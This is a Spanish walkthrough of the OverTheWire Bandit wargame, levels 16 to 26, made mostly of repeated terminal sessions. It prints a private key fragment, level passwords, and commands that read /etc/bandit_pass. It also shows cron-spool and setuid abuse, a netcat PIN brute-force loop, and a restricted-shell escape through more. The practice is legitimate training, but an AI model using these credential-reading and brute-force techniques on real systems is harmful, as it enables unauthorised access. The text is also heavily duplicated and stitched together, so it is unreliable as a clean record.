x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----
closed
bandit16@bandit:~$ chmod og-rw /tmp/ang/key
bandit16@bandit:~$ ssh -i /tmp/ang/key bandit17@localhost
Could not create directory '/home/bandit16/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn
Nivel 17 -> Nivel 18
En este nivel nos indican que tenemos dos ficheros (passwords.old y passwords.new) y que el password correcto para el siguiente nivel es el único que cambia entre los 2 ficheros, así que basta hacer un diff entre ambos ficheros para hallar dicho password.
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> 6vcSC74ROI95NqkKaeEC2ABVMDX9TyUr
- bandit17@bandit:~$ diff passwords.new passwords.old
- 42c42
- < kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
- ---
- > 6vcSC74ROI95NqkKaeEC2ABVMDX9TyUr
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> 6vcSC74ROI95NqkKaeEC2ABVMDX9TyUr
Nivel 18 -> Nivel 19
En este nivel nos dice que el password del siguiente nivel está en una fichero llamado readme, el problema es que cuando accedemos por ssh el sistema nos echa sin poder hacer nada más. La solución pasa por indicarle a ssh el comando a ejecutar (cat /home/bandit18/readme) en vez de usar ssh para entrar en el sistema.
angelluis@sunny:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 cat /home/bandit18/readme
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
- angelluis@sunny:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 cat /home/bandit18/readme
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit18@bandit.labs.overthewire.org's password:
- IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
angelluis@sunny:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 cat /home/bandit18/readme
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
Nivel 19 -> Nivel 20
En este caso se nos dice que ejecutemos el binario que tenemos en el home el cual tiene activado el bit s. Para resolver este nivel vemos que podemos pasar un comando a este binario y será ejecutado como el propietario del binario. Como se puede observar el propietario es bandit20 por tanto al ejecutarlo tenemos los permisos de dicho usuario y podemos leer el fichero /etc/bandit_pass/bandit20.
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
- bandit19@bandit:~$ ./bandit20-do
- Run a command as another user.
- Example: ./bandit20-do id
- bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
- GbKksEFF4yrVs6il55v6gwY5aVje5f0j
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Nivel 20 -> Nivel 21
Para resolver este nivel tendremos que trabajar con la gestión de trabajos de linux, para ello ejecutamos un netcat en un puerto cualquiera (en este caso 1234) y dejarlo ejecutando en segundo plano. Acto seguido ejecutamos el binario que está en el home especificando como argumento 1234 y dejando que se ejecute en segundo plano. Ahora podemos listar los trabajos activos con jobs y traer al primer proceso a primer plano e introduce la contraseña actual para que nos devuelva la del siguiente nivel.
bandit20@bandit:~$ nc -l 1234 &
[1] 29215
bandit20@bandit:~$ ./suconnect 1234 &
[2] 29355
bandit20@bandit:~$ jobs
[1]- Running nc -l 1234 &
[2]+ Running ./suconnect 1234 &
bandit20@bandit:~$ fg %1
nc -l 1234
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
[2]- Done ./suconnect 1234
- bandit20@bandit:~$ nc -l 1234 &
- [1] 29215
- bandit20@bandit:~$ ./suconnect 1234 &
- [2] 29355
- bandit20@bandit:~$ jobs
- [1]- Running nc -l 1234 &
- [2]+ Running ./suconnect 1234 &
- bandit20@bandit:~$ fg %1
- nc -l 1234
- GbKksEFF4yrVs6il55v6gwY5aVje5f0j
- Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
- Password matches, sending next password
- gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
- [2]- Done ./suconnect 1234
bandit20@bandit:~$ nc -l 1234 &
[1] 29215
bandit20@bandit:~$ ./suconnect 1234 &
[2] 29355
bandit20@bandit:~$ jobs
[1]- Running nc -l 1234 &
[2]+ Running ./suconnect 1234 &
bandit20@bandit:~$ fg %1
nc -l 1234
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
[2]- Done ./suconnect 1234
Nivel 21 -> Nivel 22
En este nivel nos dice que hay un cron que se está ejecutando periodicamente. Para resolverlo basta con acceder a cron y ver que se está escribiendo la contraseña para el siguiente nivel en un fichero determinado.
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 popularity-contest
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cron
cronjob_bandit22.sh cronjob_bandit24.sh
cronjob_bandit23.sh crontab
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
- bandit21@bandit:~$ ls /etc/cron.d
- cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 popularity-contest
- bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
- @reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
- * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
- bandit21@bandit:~$ cat /usr/bin/cron
- cronjob_bandit22.sh cronjob_bandit24.sh
- cronjob_bandit23.sh crontab
- bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
- #!/bin/bash
- chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
- cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
- bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
- Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 popularity-contest
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cron
cronjob_bandit22.sh cronjob_bandit24.sh
cronjob_bandit23.sh crontab
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Nivel 22 -> Nivel 23
Nuevamente este nivel consiste en inspeccionar cron y saber leer el script que está ejecutando. Lo que hace el script es ejecutar como bandit23 el comando echo y después un md5, así que si manualmente hacemos el comando echo y obtenemos su md5 sabremos donde está alacenando la contraseña para el siguiente nivel.
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ echo "I am user bandit23" | md5sum
8ca319486bfbbc3663ea0fbe81326349 -
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
- bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
- @reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
- * * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
- bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
- #!/bin/bash
- myname=$(whoami)
- mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
- echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
- cat /etc/bandit_pass/$myname > /tmp/$mytarget
- bandit22@bandit:~$ echo "I am user bandit23" | md5sum
- 8ca319486bfbbc3663ea0fbe81326349 -
- bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
- jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ echo "I am user bandit23" | md5sum
8ca319486bfbbc3663ea0fbe81326349 -
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Nivel 23 -> Nivel 24
Muy parecido al anterior con la diferencia de que esta vez tendremos que crear un script para obtener la contraseña del siguiente nivel.
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
bandit23@bandit:~$ nano /tmp/ang1/script.sh
bandit23@bandit:~$ cat /tmp/ang1/script.sh
cat /etc/bandit_pass/bandit24 > /tmp/ang1/pass
bandit23@bandit:~$ chmod 777 /tmp/ang1
bandit23@bandit:~$ chmod 777 /tmp/ang1/script.sh
bandit23@bandit:~$ cp /tmp/ang1/script.sh /var/spool/bandit24/
bandit23@bandit:~$ date
Sun Aug 12 20:48:55 CEST 2018
bandit23@bandit:~$ date
Sun Aug 12 20:49:01 CEST 2018
bandit23@bandit:~$ ll /var/spool/bandit24/script.sh
ls: cannot access '/var/spool/bandit24/script.sh': No such file or directory
bandit23@bandit:~$ cat /tmp/ang1/pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ- bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
- @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
- * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
- bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
- #!/bin/bash
- myname=$(whoami)
- cd /var/spool/$myname
- echo "Executing and deleting all scripts in /var/spool/$myname:"
- for i in * .*;
- do
- if [ "$i" != "." -a "$i" != ".." ];
- then
- echo "Handling $i"
- timeout -s 9 60 ./$i
- rm -f ./$i
- fi
- done
- bandit23@bandit:~$ nano /tmp/ang1/script.sh
- bandit23@bandit:~$ cat /tmp/ang1/script.sh
- cat /etc/bandit_pass/bandit24 > /tmp/ang1/pass
- bandit23@bandit:~$ chmod 777 /tmp/ang1
- bandit23@bandit:~$ chmod 777 /tmp/ang1/script.sh
- bandit23@bandit:~$ cp /tmp/ang1/script.sh /var/spool/bandit24/
- bandit23@bandit:~$ date
- Sun Aug 12 20:48:55 CEST 2018
- bandit23@bandit:~$ date
- Sun Aug 12 20:49:01 CEST 2018
- bandit23@bandit:~$ ll /var/spool/bandit24/script.sh
- ls: cannot access '/var/spool/bandit24/script.sh': No such file or directory
- bandit23@bandit:~$ cat /tmp/ang1/pass
- UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
bandit23@bandit:~$ nano /tmp/ang1/script.sh
bandit23@bandit:~$ cat /tmp/ang1/script.sh
cat /etc/bandit_pass/bandit24 > /tmp/ang1/pass
bandit23@bandit:~$ chmod 777 /tmp/ang1
bandit23@bandit:~$ chmod 777 /tmp/ang1/script.sh
bandit23@bandit:~$ cp /tmp/ang1/script.sh /var/spool/bandit24/
bandit23@bandit:~$ date
Sun Aug 12 20:48:55 CEST 2018
bandit23@bandit:~$ date
Sun Aug 12 20:49:01 CEST 2018
bandit23@bandit:~$ ll /var/spool/bandit24/script.sh
ls: cannot access '/var/spool/bandit24/script.sh': No such file or directory
bandit23@bandit:~$ cat /tmp/ang1/pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZNivel 24 -> Nivel 25
En este nivel, de nuevo, hay un demonio corriendo en el puerto 30002 el cual nos pide la contraseña actual y un pin de 4 cifras para que nos devuelva la contraseña del siguiente nivel. En este nivel empleo 2 enfoques, el primero era hacer un bucle del 0 al 10000 y hacer un llamada a nc para cada pasada del bucle, este enfoque es muy lento y lo abandone (el codigo lo sigo dejando al principio). El segundo enfoque fue generar un fichero con todos los pin posibles y pasarselo directamente a netcat lo cual es mucho mas eficiente y devuelve la clave para el siguiente nivel.
bandit24@bandit:/tmp/brute$ cat /tmp/brute/brute.sh
#/bin/bash
for i in {0..10000}; do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v -e pincode -e Wrong -e Exiting
echo "Try $i";
done
# TARDA MUCHO
#!/bin/bash
for i in {1..10000}
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
done
cat out | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.- bandit24@bandit:/tmp/brute$ cat /tmp/brute/brute.sh
- #/bin/bash
- for i in {0..10000}; do
- echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v -e pincode -e Wrong -e Exiting
- echo "Try $i";
- done
- # TARDA MUCHO
- #!/bin/bash
- for i in {1..10000}
- do
- echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
- done
- cat out | nc localhost 30002
- I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Wrong! Please enter the correct pincode. Try again.
- Correct!
- The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
- Exiting.
bandit24@bandit:/tmp/brute$ cat /tmp/brute/brute.sh
#/bin/bash
for i in {0..10000}; do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v -e pincode -e Wrong -e Exiting
echo "Try $i";
done
# TARDA MUCHO
#!/bin/bash
for i in {1..10000}
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
done
cat out | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.Nivel 25 -> Nivel 26
Este nivel fue bastante interesante. Para empezar tienes que usar la clave ssh que tienes en home para loguearte en el siguiente nivel. Cuando accedemos al siguiente nivel con la clave ssh vemos que nos echa fuera. Si miramos la shell que está usando dicho usuarios vemos que es un script que hace uso del programa more. More tiene una peculiaridad, si el texto cabe en pantalla el programa muestra el texto y se cierra el programa, pero si el texto no cabe en pantalla nos da la opción de poder subir y bajar por el texto y además poder escribir comandos si pulsamos dos puntos (:). Para resolver este nivel debemos hacer la ventana pequeña para que nos permita ejecutar comandos y escribir:
:set shell=/bin/bash
:shell
- :set shell=/bin/bash
- :shell
:set shell=/bin/bash
:shell
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
,----.. ,----, .---.
/ / \ ,/ .`| /. ./|
/ . : ,` .' : .--'. ' ;
. / ;. \ ; ; / /__./ \ : |
. ; / ` ; .'___,/ ,' .--'. ' \' .
; | ; \ ; | | : | /___/ \ | ' '
| : | ; | ' ; |.'; ; ; \ \; :
. | ' ' ' : `----' | | \ ; ` |
' ; \; / | ' : ; . \ .\ ;
\ \ ', / | | ' \ \ ' \ |
; : / ' : | : ' |--"
\ \ .' ; |.' \ \ ;
www. `---` ver '---' he '---" ire.org
Welcome to OverTheWire!
If you find any problems, please report them to Steven or morla on
irc.overthewire.org.
--[ Playing the games ]--
This machine might hold several wargames.
If you are playing "somegame", then:
* USERNAMES are somegame0, somegame1, ...
* Most LEVELS are stored in /somegame/.
* PASSWORDS for each level are stored in /etc/somegame_pass/.
Write-access to homedirectories is disabled. It is advised to create a
working directory with a hard-to-guess name in /tmp/. You can use the
command "mktemp -d" in order to generate a random and hard to guess
directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
so that users can not snoop on eachother. Files and directories with
easily guessable or short names will be periodically deleted!
Please play nice:
* don't leave orphan processes running
* don't leave exploit-files laying around
* don't annoy other players
* don't post passwords or spoilers
* again, DONT POST SPOILERS!
This includes writeups of your solution on your blog or website!
--[ Tips ]--
This machine has a 64bit processor and many security-features enabled
by default, although ASLR has been switched off. The following
compiler flags might be interesting:
-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro
In addition, the execstack tool can be used to flag the stack as
executable on ELF binaries.
Finally, network-access is limited for most levels by a local
firewall.
--[ Tools ]--
For your convenience we have installed a few usefull tools which you can find
in the following locations:
* peda (https://github.com/longld/peda.git) in /usr/local/peda/
* gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
* pwntools (https://github.com/Gallopsled/pwntools)
* radare2 (http://www.radare.org/)
* checksec.sh (http://www.trapkit.de/tools/checksec.html) in /usr/local/bin/checksec.sh
--[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us through IRC on
irc.overthewire.org #wargames.
Enjoy your stay!
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
|_.__/ \__,_|_| |_|\__,_|_|\__|____\___/
Connection to localhost closed.
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
:! /bin/bash
:set shell=/bin/bash
:shell
[No write since last change]
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z- bandit25@bandit:~$ ls
- bandit26.sshkey
- bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
- Could not create directory '/home/bandit25/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
-
- ,----.. ,----, .---.
- / / \ ,/ .`| /. ./|
- / . : ,` .' : .--'. ' ;
- . / ;. \ ; ; / /__./ \ : |
- . ; / ` ; .'___,/ ,' .--'. ' \' .
- ; | ; \ ; | | : | /___/ \ | ' '
- | : | ; | ' ; |.'; ; ; \ \; :
- . | ' ' ' : `----' | | \ ; ` |
- ' ; \; / | ' : ; . \ .\ ;
- \ \ ', / | | ' \ \ ' \ |
- ; : / ' : | : ' |--"
- \ \ .' ; |.' \ \ ;
- www. `---` ver '---' he '---" ire.org
-
-
- Welcome to OverTheWire!
- If you find any problems, please report them to Steven or morla on
- irc.overthewire.org.
- --[ Playing the games ]--
- This machine might hold several wargames.
- If you are playing "somegame", then:
- * USERNAMES are somegame0, somegame1, ...
- * Most LEVELS are stored in /somegame/.
- * PASSWORDS for each level are stored in /etc/somegame_pass/.
- Write-access to homedirectories is disabled. It is advised to create a
- working directory with a hard-to-guess name in /tmp/. You can use the
- command "mktemp -d" in order to generate a random and hard to guess
- directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
- so that users can not snoop on eachother. Files and directories with
- easily guessable or short names will be periodically deleted!
-
- Please play nice:
-
- * don't leave orphan processes running
- * don't leave exploit-files laying around
- * don't annoy other players
- * don't post passwords or spoilers
- * again, DONT POST SPOILERS!
- This includes writeups of your solution on your blog or website!
- --[ Tips ]--
- This machine has a 64bit processor and many security-features enabled
- by default, although ASLR has been switched off. The following
- compiler flags might be interesting:
- -m32 compile for 32bit
- -fno-stack-protector disable ProPolice
- -Wl,-z,norelro disable relro
- In addition, the execstack tool can be used to flag the stack as
- executable on ELF binaries.
- Finally, network-access is limited for most levels by a local
- firewall.
- --[ Tools ]--
- For your convenience we have installed a few usefull tools which you can find
- in the following locations:
- * peda (https://github.com/longld/peda.git) in /usr/local/peda/
- * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
- * pwntools (https://github.com/Gallopsled/pwntools)
- * radare2 (http://www.radare.org/)
- * checksec.sh (http://www.trapkit.de/tools/checksec.html) in /usr/local/bin/checksec.sh
- --[ More information ]--
- For more information regarding individual wargames, visit
- http://www.overthewire.org/wargames/
- For support, questions or comments, contact us through IRC on
- irc.overthewire.org #wargames.
- Enjoy your stay!
- _ _ _ _ ___ __
- | | | (_) | |__ \ / /
- | |__ __ _ _ __ __| |_| |_ ) / /_
- | '_ \ / _` | '_ \ / _` | | __| / / '_ \
- | |_) | (_| | | | | (_| | | |_ / /| (_) |
- |_.__/ \__,_|_| |_|\__,_|_|\__|____\___/
- Connection to localhost closed.
- bandit25@bandit:~$ cat /etc/passwd | grep bandit26
- bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
- bandit25@bandit:~$ file /usr/bin/showtext
- /usr/bin/showtext: POSIX shell script, ASCII text executable
- bandit25@bandit:~$ cat /usr/bin/showtext
- #!/bin/sh
- export TERM=linux
- more ~/text.txt
- exit 0
- bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
- :! /bin/bash
- :set shell=/bin/bash
- :shell
- [No write since last change]
- bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
- 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
,----.. ,----, .---.
/ / \ ,/ .`| /. ./|
/ . : ,` .' : .--'. ' ;
. / ;. \ ; ; / /__./ \ : |
. ; / ` ; .'___,/ ,' .--'. ' \' .
; | ; \ ; | | : | /___/ \ | ' '
